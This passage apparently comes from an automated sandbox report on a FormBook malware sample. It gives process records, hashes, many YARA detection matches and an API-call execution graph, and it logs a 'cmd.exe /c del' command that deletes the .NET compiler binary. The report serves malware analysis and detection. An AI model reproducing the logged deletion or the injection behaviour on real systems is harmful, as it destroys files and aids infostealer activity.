                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:6
                                                                                                                                                                      Start time:06:33:00
                                                                                                                                                                      Start date:09/10/2024
                                                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                      Imagebase:0x7ff609140000
                                                                                                                                                                      File size:5'141'208 bytes
                                                                                                                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000006.00000002.4578868311.000000000E24E000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:false

                                                                                                                                                                      Target ID:7
                                                                                                                                                                      Start time:06:33:03
                                                                                                                                                                      Start date:09/10/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\wlanext.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\SysWOW64\wlanext.exe"
                                                                                                                                                                      Imagebase:0xfd0000
                                                                                                                                                                      File size:78'336 bytes
                                                                                                                                                                      MD5 hash:0D5F0A7CA2A8A47E3A26FB1CB67E118C
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                      Has exited:false

                                                                                                                                                                      Target ID:9
                                                                                                                                                                      Start time:06:33:06
                                                                                                                                                                      Start date:09/10/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                                                                                                                                                                      Imagebase:0x1c0000
                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:10
                                                                                                                                                                      Start time:06:33:07
                                                                                                                                                                      Start date:09/10/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Reset < >

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:4.9%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                        Signature Coverage:26.5%
                                                                                                                                                                        Total number of Nodes:889
                                                                                                                                                                        Total number of Limit Nodes:51
                                                                                                                                                                        execution_graph 30264 7ff67fa5d9ea SleepEx WaitForSingleObject SwitchToThread SwitchToThread 30161 7ff67fa5df50 45 API calls 30163 7ff67fa77c37 50 API calls ISource 30187 7ff67faffbe0 LocaleNameToLCID 30164 7ff67fa64cd9 VirtualAlloc VirtualUnlock _swprintf_c_l 30188 7ff67fa453e0 WaitForMultipleObjectsEx SetLastError CoWaitForMultipleHandles SetLastError 30165 7ff67fa5d8d0 59 API calls 30225 7ff67fa542e0 GetCurrentThreadId SleepEx malloc RtlPcToFileHeader RaiseException 29539 7ff67faf30d0 29540 7ff67faf30e1 29539->29540 29542 7ff67faf30ea 29539->29542 29541 7ff67faf3105 29542->29541 29544 7ff67faf3050 29542->29544 29545 7ff67faf3069 29544->29545 29548 7ff67faf3160 29545->29548 29547 7ff67faf3079 29547->29541 29549 7ff67faf3177 29548->29549 29551 7ff67faf31ea 29548->29551 29553 7ff67faf3220 26 API calls 29549->29553 29551->29547 29552 7ff67faf318b 29552->29547 29553->29552 30229 7ff67fa832d0 16 API calls 29554 7ff67fa508d0 29555 7ff67fa508ea 29554->29555 29556 7ff67fa508f5 29554->29556 29557 7ff67fa50922 VirtualAlloc 29556->29557 29562 7ff67fa5096e 29556->29562 29558 7ff67fa50955 29557->29558 29557->29562 29563 7ff67faaac48 29558->29563 29561 7ff67fa509c1 VirtualFree 29561->29562 29566 7ff67faab610 29563->29566 29567 7ff67faab62a malloc 29566->29567 29568 7ff67fa50966 29567->29568 29569 7ff67faab61b 29567->29569 29568->29561 29568->29562 29569->29567 29570 7ff67faab63a 29569->29570 29571 7ff67faab645 29570->29571 29575 7ff67faab924 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 29570->29575 29576 7ff67faab944 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 29571->29576 29574 7ff67faab64b 29576->29574 30167 7ff67fa580d0 15 API calls 30230 7ff67fa792ce 63 API calls 2 library calls 29577 7ff67fa6c9b6 29578 7ff67fa6c9bf 29577->29578 29581 7ff67fa6c9da ISource 29577->29581 29661 7ff67fa80c30 QueryPerformanceCounter 29578->29661 29580 7ff67fa6c9ce 29582 7ff67fa6d127 29580->29582 29666 7ff67fa5bdb0 46 API calls 29580->29666 29583 7ff67fa6ca3e 29581->29583 29662 7ff67fa667f0 VirtualFree 29581->29662 29620 7ff67fa7adb0 29583->29620 29589 7ff67fa6cab5 29632 7ff67fa6dfd0 29589->29632 29591 7ff67fa6cad4 29647 7ff67fa72370 29591->29647 29592 7ff67fa6ca48 _swprintf_c_l 29592->29589 29663 7ff67fa7d0e0 EnterCriticalSection LeaveCriticalSection _swprintf_c_l 29592->29663 29594 7ff67fa6caff 29596 7ff67fa50130 4 API calls 29594->29596 29597 7ff67fa6cb25 29594->29597 29596->29597 29598 7ff67fa6a330 13 API calls 29597->29598 29599 7ff67fa6cc04 29598->29599 29600 7ff67fa67e30 4 API calls 29599->29600 29602 7ff67fa6cc10 29600->29602 29601 7ff67fa6cc2b 29603 7ff67fa6cc3d EnterCriticalSection 29601->29603 29616 7ff67fa6d0c5 29601->29616 29602->29601 29664 7ff67fa81200 28 API calls _swprintf_c_l 29602->29664 29605 7ff67fa6ccbd 29603->29605 29606 7ff67fa6cd1e LeaveCriticalSection 29603->29606 29605->29606 29665 7ff67fa4bc10 7 API calls 29605->29665 29612 7ff67fa6cd03 29606->29612 29607 7ff67fa6d0cc GetTickCount64 29607->29580 29609 7ff67fa6ccdf 29609->29606 29610 7ff67fa6ccec LeaveCriticalSection 29609->29610 29610->29612 29611 7ff67fa6cf64 29611->29607 29611->29616 29651 7ff67fa69980 29611->29651 29612->29611 29615 7ff67fa64020 7 API calls 29612->29615 29617 7ff67fa6ce69 29612->29617 29613 7ff67fa6cf19 29613->29611 29618 7ff67fa69980 4 API calls 29613->29618 29615->29612 29616->29607 29617->29613 29619 7ff67fa6a330 13 API calls 29617->29619 29618->29611 29619->29613 29621 7ff67fa7adc2 _swprintf_c_l 29620->29621 29623 7ff67fa6ca43 29620->29623 29621->29623 29667 7ff67fa7d0e0 EnterCriticalSection LeaveCriticalSection _swprintf_c_l 29621->29667 29624 7ff67fa5e5f0 29623->29624 29626 7ff67fa5e614 _swprintf_c_l 29624->29626 29625 7ff67fa5e6e0 _swprintf_c_l 29627 7ff67fa5e7d0 29625->29627 29670 7ff67fa7d0e0 EnterCriticalSection LeaveCriticalSection _swprintf_c_l 29625->29670 29671 7ff67fa80e70 DebugBreak DebugBreak DebugBreak DebugBreak 29625->29671 29626->29625 29668 7ff67fa7d0e0 EnterCriticalSection LeaveCriticalSection _swprintf_c_l 29626->29668 29669 7ff67fa80e70 DebugBreak DebugBreak DebugBreak DebugBreak 29626->29669 29627->29592 29633 7ff67fa6e084 29632->29633 29635 7ff67fa6e1ea 29633->29635 29672 7ff67fa51630 QueryPerformanceCounter 29633->29672 29641 7ff67fa6e38d 29635->29641 29673 7ff67fa5d390 24 API calls 29635->29673 29637 7ff67fa6e356 29638 7ff67fa6e414 29637->29638 29637->29641 29674 7ff67fa64120 7 API calls 29637->29674 29675 7ff67fa7d0e0 EnterCriticalSection LeaveCriticalSection _swprintf_c_l 29638->29675 29642 7ff67fa50e30 10 API calls 29641->29642 29646 7ff67fa6e408 29641->29646 29642->29646 29643 7ff67fa6e378 29643->29638 29644 7ff67fa6e380 29643->29644 29645 7ff67fa67a30 5 API calls 29644->29645 29645->29641 29646->29591 29648 7ff67fa723ad 29647->29648 29650 7ff67fa723d7 29647->29650 29649 7ff67fa50e30 10 API calls 29648->29649 29649->29650 29650->29594 29652 7ff67fa6999b 29651->29652 29656 7ff67fa699cf 29652->29656 29676 7ff67fa51630 QueryPerformanceCounter 29652->29676 29677 7ff67fa519f0 WaitForSingleObject 29656->29677 29661->29580 29662->29583 29663->29592 29664->29601 29665->29609 29666->29582 29667->29621 29668->29626 29669->29626 29670->29625 29671->29625 29672->29635 29673->29637 29674->29643 29675->29641 29676->29656 30192 7ff67fa5df97 18 API calls 30265 7ff67fa799c3 52 API calls _swprintf_c_l 30155 7ff67fa5dfbf 30156 7ff67fa80720 18 API calls 30155->30156 30157 7ff67fa5df97 30156->30157 30158 7ff67fa80720 18 API calls 30157->30158 30159 7ff67fa5e085 30157->30159 30158->30157 30232 7ff67fa44ec3 25 API calls 30169 7ff67fa43930 17 API calls 30194 7ff67fa47430 GetCurrentProcess FlushInstructionCache VirtualProtect 30268 7ff67fa44230 8 API calls 29107 7ff67fa6d233 29108 7ff67fa6d23d 29107->29108 29147 7ff67fa63b10 29108->29147 29111 7ff67fa6d2bd 29181 7ff67fa51630 QueryPerformanceCounter 29111->29181 29112 7ff67fa6d3f2 29115 7ff67fa6d2c9 29112->29115 29182 7ff67fa66190 10 API calls 29112->29182 29116 7ff67fa6d66a 29115->29116 29117 7ff67fa6d675 29115->29117 29122 7ff67fa6d673 29115->29122 29183 7ff67fa63910 39 API calls 29116->29183 29117->29122 29184 7ff67fa51670 ResetEvent 29117->29184 29122->29122 29151 7ff67fa67e30 29122->29151 29126 7ff67fa6d909 29133 7ff67fa6d95f _swprintf_c_l 29126->29133 29191 7ff67fa81200 28 API calls _swprintf_c_l 29126->29191 29128 7ff67fa6d8ff 29187 7ff67fa4c650 29128->29187 29129 7ff67fa6da41 29169 7ff67fa68830 29129->29169 29132 7ff67fa6dcf1 29135 7ff67fa6dda5 29132->29135 29195 7ff67fa6a330 29132->29195 29133->29129 29133->29132 29192 7ff67fa7d0e0 EnterCriticalSection LeaveCriticalSection _swprintf_c_l 29133->29192 29137 7ff67fa6d883 SwitchToThread 29138 7ff67fa6d74b 29137->29138 29138->29126 29138->29128 29138->29133 29138->29137 29140 7ff67fa6d8af SwitchToThread 29138->29140 29142 7ff67fa6d877 SwitchToThread 29138->29142 29185 7ff67fa51690 SleepEx 29138->29185 29186 7ff67fa825f0 WaitForSingleObject 29138->29186 29140->29138 29142->29138 29143 7ff67fa6da4d 29193 7ff67fa51630 QueryPerformanceCounter 29143->29193 29145 7ff67fa6dbad 29194 7ff67fa69a50 15 API calls 2 library calls 29145->29194 29148 7ff67fa63b8b 29147->29148 29149 7ff67fa63b1d 29147->29149 29148->29111 29148->29112 29149->29148 29150 7ff67fa63b6e DebugBreak 29149->29150 29150->29149 29152 7ff67fa67e41 29151->29152 29157 7ff67fa67f54 29151->29157 29203 7ff67fa50130 29152->29203 29154 7ff67fa67e5c 29155 7ff67fa67eb4 29154->29155 29159 7ff67fa50130 4 API calls 29154->29159 29156 7ff67fa67f04 29155->29156 29158 7ff67fa50130 4 API calls 29155->29158 29156->29157 29160 7ff67fa50130 4 API calls 29156->29160 29161 7ff67fa820b0 29157->29161 29158->29155 29159->29154 29160->29156 29165 7ff67fa820b9 29161->29165 29162 7ff67fa8224d 29162->29138 29163 7ff67fa82137 DebugBreak 29164 7ff67fa82146 29163->29164 29166 7ff67fa821b7 DebugBreak 29164->29166 29168 7ff67fa821c6 29164->29168 29165->29162 29165->29163 29165->29164 29166->29168 29167 7ff67fa8223a DebugBreak 29167->29162 29168->29162 29168->29167 29170 7ff67fa6885a 29169->29170 29171 7ff67fa68888 29170->29171 29178 7ff67fa68a76 29170->29178 29175 7ff67fa6891b 29171->29175 29216 7ff67fa67a30 29171->29216 29174 7ff67fa69954 29174->29143 29177 7ff67fa689e5 EnterCriticalSection LeaveCriticalSection 29175->29177 29180 7ff67fa68a71 29175->29180 29223 7ff67fa51770 VirtualFree 29175->29223 29177->29175 29178->29180 29211 7ff67fa67be0 29178->29211 29224 7ff67faaacf0 8 API calls 2 library calls 29180->29224 29181->29115 29182->29112 29183->29122 29185->29138 29186->29138 29188 7ff67fa4c65d 29187->29188 29235 7ff67fa43260 15 API calls 29188->29235 29190 7ff67fa4c6c4 29191->29133 29192->29133 29193->29145 29194->29132 29196 7ff67fa6a37a 29195->29196 29197 7ff67fa6a33f 29195->29197 29236 7ff67fa56ee0 QueryPerformanceCounter 29196->29236 29198 7ff67fa50130 4 API calls 29197->29198 29198->29196 29200 7ff67fa6a3cb 29237 7ff67fa6c0c0 8 API calls ISource 29200->29237 29202 7ff67fa6a3d0 29202->29135 29204 7ff67fa501dc 29203->29204 29207 7ff67fa5016b 29203->29207 29204->29154 29205 7ff67fa501a4 29205->29204 29210 7ff67fa501f0 malloc RtlPcToFileHeader RaiseException _swprintf_c_l 29205->29210 29207->29204 29207->29205 29209 7ff67fa4fe50 4 API calls 2 library calls 29207->29209 29209->29205 29210->29204 29212 7ff67fa67bed 29211->29212 29213 7ff67fa67bf4 29211->29213 29212->29180 29214 7ff67fa67c69 29213->29214 29215 7ff67fa67a30 5 API calls 29213->29215 29214->29180 29215->29213 29225 7ff67fa82480 29216->29225 29218 7ff67fa67b69 29218->29171 29218->29218 29219 7ff67fa67a69 _swprintf_c_l 29219->29218 29233 7ff67fa51770 VirtualFree 29219->29233 29221 7ff67fa67b2e 29221->29218 29222 7ff67fa67b3c EnterCriticalSection LeaveCriticalSection 29221->29222 29222->29218 29223->29175 29224->29174 29226 7ff67fa8249a 29225->29226 29227 7ff67fa824a3 29226->29227 29234 7ff67fa51770 VirtualFree 29226->29234 29229 7ff67fa824bd EnterCriticalSection 29227->29229 29230 7ff67fa824f3 29227->29230 29231 7ff67fa824e7 LeaveCriticalSection 29229->29231 29232 7ff67fa824e0 29229->29232 29230->29219 29231->29230 29232->29231 29233->29221 29234->29227 29235->29190 29236->29200 29237->29202 30195 7ff67faaac2c GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 30196 7ff67fa56830 QueryPerformanceCounter 30270 7ff67fa5de1b 23 API calls 29244 7ff67fa8031b 29245 7ff67fa8032c 29244->29245 29246 7ff67fa8035a 29245->29246 29248 7ff67fa58808 29245->29248 29249 7ff67fa5880d 29248->29249 29266 7ff67fa6ad30 29249->29266 29252 7ff67fa5884d 29270 7ff67fa51630 QueryPerformanceCounter 29252->29270 29255 7ff67fa5886e 29256 7ff67fa4c650 15 API calls 29255->29256 29257 7ff67fa588be 29256->29257 29271 7ff67fa7e8c0 29257->29271 29259 7ff67fa588c3 29260 7ff67fa589cd 29259->29260 29281 7ff67fa51630 QueryPerformanceCounter 29259->29281 29261 7ff67fa6ad30 SwitchToThread 29260->29261 29262 7ff67fa58a55 29261->29262 29265 7ff67fa58a78 29262->29265 29282 7ff67fa51680 SetEvent 29262->29282 29265->29246 29267 7ff67fa5882f 29266->29267 29268 7ff67fa6ad4f 29266->29268 29267->29252 29280 7ff67fa51670 ResetEvent 29267->29280 29268->29267 29269 7ff67fa6ad91 SwitchToThread 29268->29269 29269->29268 29270->29255 29272 7ff67fa7e8d3 29271->29272 29273 7ff67fa7e8e1 29271->29273 29272->29273 29274 7ff67fa7e9ae 29272->29274 29283 7ff67fa6b100 46 API calls 29272->29283 29273->29259 29279 7ff67fa7e9b2 29274->29279 29284 7ff67fa6bc40 38 API calls 29274->29284 29277 7ff67fa7e9d9 29277->29279 29285 7ff67fa6f900 29277->29285 29279->29259 29281->29260 29283->29274 29284->29277 29287 7ff67fa6f916 29285->29287 29286 7ff67fa6f947 29286->29279 29287->29286 29288 7ff67fa6f9b0 29287->29288 29289 7ff67fa50130 4 API calls 29287->29289 29293 7ff67fa82320 29288->29293 29289->29288 29292 7ff67fa50130 4 API calls 29292->29286 29294 7ff67fa82359 EnterCriticalSection 29293->29294 29300 7ff67fa823e5 29293->29300 29296 7ff67fa82379 LeaveCriticalSection 29294->29296 29296->29300 29297 7ff67fa6f9d9 29297->29286 29297->29292 29298 7ff67fa82413 29298->29297 29301 7ff67fa82424 EnterCriticalSection 29298->29301 29300->29297 29304 7ff67fa516e0 29300->29304 29302 7ff67fa8244a LeaveCriticalSection 29301->29302 29303 7ff67fa82443 29301->29303 29302->29297 29303->29302 29305 7ff67fa516fb VirtualAlloc 29304->29305 29306 7ff67fa5171e GetCurrentProcess VirtualAllocExNuma 29304->29306 29305->29298 29306->29298 29317 7ff67fafe620 29330 7ff67fa454e0 29317->29330 29319 7ff67fafe640 29346 7ff67fa44340 malloc RtlPcToFileHeader RaiseException _swprintf_c_l 29319->29346 29321 7ff67fafe648 29347 7ff67fafe7e0 85 API calls 29321->29347 29323 7ff67fafe666 29348 7ff67fa420e0 29323->29348 29325 7ff67fafe678 29326 7ff67fafe69b 29325->29326 29356 7ff67fafe990 85 API calls 29325->29356 29357 7ff67faf2fa0 85 API calls 29326->29357 29329 7ff67fafe6a8 29331 7ff67fa45548 29330->29331 29332 7ff67fa4550f 29330->29332 29331->29319 29332->29331 29333 7ff67fa455df 29332->29333 29334 7ff67fa455c6 29332->29334 29341 7ff67fa45588 29332->29341 29342 7ff67fa455a7 29332->29342 29335 7ff67fa455e6 29333->29335 29336 7ff67fa455ff 29333->29336 29358 7ff67fa42ce0 29334->29358 29364 7ff67fa4b980 GetStdHandle WriteFile 29335->29364 29338 7ff67fa4562f 29336->29338 29365 7ff67fa45370 GetLastError SetLastError 29336->29365 29338->29319 29340 7ff67fa455f2 RaiseFailFastException 29340->29336 29344 7ff67fa45590 Sleep 29341->29344 29342->29334 29345 7ff67fa455b9 RaiseFailFastException 29342->29345 29344->29342 29344->29344 29345->29334 29346->29321 29347->29323 29349 7ff67fa420e9 29348->29349 29352 7ff67fa4213b 29348->29352 29350 7ff67fa4212e 29349->29350 29369 7ff67fa4c700 29349->29369 29350->29325 29354 7ff67fa4218c 29352->29354 29374 7ff67fa42540 26 API calls 29352->29374 29354->29325 29356->29325 29357->29329 29359 7ff67fa42d06 29358->29359 29363 7ff67fa42d24 29359->29363 29366 7ff67fa4b4e0 FlsGetValue 29359->29366 29361 7ff67fa42d1c 29362 7ff67fa44930 6 API calls 29361->29362 29362->29363 29363->29333 29364->29340 29367 7ff67fa4b4fa RaiseFailFastException 29366->29367 29368 7ff67fa4b508 FlsSetValue 29366->29368 29367->29368 29370 7ff67fa4c746 29369->29370 29371 7ff67fa4c786 29370->29371 29375 7ff67fa574ab 29370->29375 29383 7ff67fa5759b 29370->29383 29371->29352 29376 7ff67fa57516 29375->29376 29378 7ff67fa574ec 29375->29378 29403 7ff67fa5d150 29376->29403 29379 7ff67fa574fa 29378->29379 29380 7ff67fa574f5 DebugBreak 29378->29380 29379->29371 29380->29379 29384 7ff67fa575bc 29383->29384 29385 7ff67fa575ce 29384->29385 29488 7ff67fa63910 39 API calls 29384->29488 29387 7ff67fa57625 29385->29387 29389 7ff67fa575fe GetTickCount64 29385->29389 29396 7ff67fa576a7 29385->29396 29388 7ff67fa57637 29387->29388 29489 7ff67fa63910 39 API calls 29387->29489 29392 7ff67fa82520 14 API calls 29388->29392 29389->29387 29393 7ff67fa57612 29389->29393 29398 7ff67fa57649 29392->29398 29393->29396 29394 7ff67fa576e3 29395 7ff67fa57570 29394->29395 29397 7ff67fa574fa 29394->29397 29399 7ff67fa57709 29394->29399 29487 7ff67fa825f0 WaitForSingleObject 29395->29487 29396->29395 29490 7ff67fa5d810 59 API calls 29396->29490 29397->29371 29398->29395 29398->29396 29401 7ff67fa57683 GetTickCount64 29398->29401 29399->29397 29491 7ff67fa5a000 SleepEx SwitchToThread DebugBreak ISource 29399->29491 29401->29393 29401->29396 29410 7ff67fa5d182 29403->29410 29406 7ff67fa63910 39 API calls 29406->29410 29407 7ff67fa76690 GetTickCount64 29407->29410 29410->29406 29410->29407 29412 7ff67fa57539 29410->29412 29414 7ff67fa5de60 29410->29414 29425 7ff67fa82520 29410->29425 29435 7ff67fa825f0 WaitForSingleObject 29410->29435 29436 7ff67fa6adc0 SleepEx SwitchToThread SwitchToThread 29410->29436 29437 7ff67fa5d810 59 API calls 29410->29437 29412->29379 29413 7ff67fa5a000 SleepEx SwitchToThread DebugBreak ISource 29412->29413 29413->29379 29415 7ff67fa5de9c 29414->29415 29418 7ff67fa5df48 29414->29418 29416 7ff67fa5df5a 29415->29416 29417 7ff67fa5df09 29415->29417 29416->29418 29439 7ff67fa57060 WaitForSingleObject 29416->29439 29421 7ff67fa5df18 SwitchToThread 29417->29421 29424 7ff67fa5df50 29418->29424 29440 7ff67fa80720 29418->29440 29422 7ff67fa5df26 29421->29422 29422->29418 29438 7ff67fa6adc0 SleepEx SwitchToThread SwitchToThread 29422->29438 29424->29410 29426 7ff67fa825da 29425->29426 29427 7ff67fa82540 29425->29427 29426->29410 29477 7ff67fa50e30 29427->29477 29430 7ff67fa825ca 29430->29410 29432 7ff67fa8259e 29433 7ff67fa825b1 29432->29433 29485 7ff67fa6adc0 SleepEx SwitchToThread SwitchToThread 29432->29485 29433->29410 29435->29410 29436->29410 29437->29410 29438->29418 29439->29422 29445 7ff67fa5adf0 29440->29445 29442 7ff67fa80758 29443 7ff67fa8081c 29442->29443 29456 7ff67fa5b250 29442->29456 29443->29418 29446 7ff67fa5ae39 29445->29446 29447 7ff67fa5af10 29446->29447 29469 7ff67fa80570 SwitchToThread SwitchToThread SwitchToThread SwitchToThread 29446->29469 29447->29442 29449 7ff67fa5af49 _swprintf_c_l 29451 7ff67fa5b122 29449->29451 29470 7ff67fa73410 VirtualAlloc VirtualUnlock _swprintf_c_l 29449->29470 29452 7ff67fa5b1e9 29451->29452 29453 7ff67fa5b1a0 29451->29453 29472 7ff67fa5b750 VirtualAlloc VirtualUnlock DebugBreak _swprintf_c_l 29452->29472 29471 7ff67fa629c0 6 API calls _swprintf_c_l 29453->29471 29458 7ff67fa5b2d8 29456->29458 29457 7ff67fa5b46d 29457->29442 29458->29457 29459 7ff67fa5b2dd 29458->29459 29461 7ff67fa6f900 11 API calls 29458->29461 29459->29457 29460 7ff67fa5b405 29459->29460 29473 7ff67fa80570 SwitchToThread SwitchToThread SwitchToThread SwitchToThread 29459->29473 29463 7ff67fa5b477 29460->29463 29464 7ff67fa5b432 29460->29464 29461->29459 29476 7ff67fa5b750 VirtualAlloc VirtualUnlock DebugBreak _swprintf_c_l 29463->29476 29475 7ff67fa629c0 6 API calls _swprintf_c_l 29464->29475 29465 7ff67fa5b3da 29465->29460 29474 7ff67fa73410 VirtualAlloc VirtualUnlock _swprintf_c_l 29465->29474 29469->29449 29470->29451 29471->29447 29472->29447 29473->29465 29474->29460 29475->29457 29476->29457 29478 7ff67fa50e67 GetCurrentProcess 29477->29478 29479 7ff67fa50f1f GlobalMemoryStatusEx 29477->29479 29480 7ff67fa50e80 29478->29480 29482 7ff67fa50e88 29479->29482 29480->29479 29480->29482 29486 7ff67faaacf0 8 API calls 2 library calls 29482->29486 29483 7ff67fa50ff8 29483->29430 29484 7ff67fa57060 WaitForSingleObject 29483->29484 29484->29432 29485->29433 29486->29483 29487->29395 29488->29385 29489->29388 29490->29394 29491->29397 30235 7ff67fa44720 6 API calls 30171 7ff67fa4a520 9 API calls 30198 7ff67fa56820 SleepEx SwitchToThread 30238 7ff67fa57f20 GetCurrentThreadId malloc RtlPcToFileHeader RaiseException 30272 7ff67fa56a20 SleepEx WaitForSingleObject SwitchToThread SwitchToThread SwitchToThread 30273 7ff67fa41a08 85 API calls 30173 7ff67fa56910 15 API calls 2 library calls 30174 7ff67fa57910 SetEvent 30240 7ff67fa5ab10 DebugBreak DebugBreak 30175 7ff67faff100 88 API calls 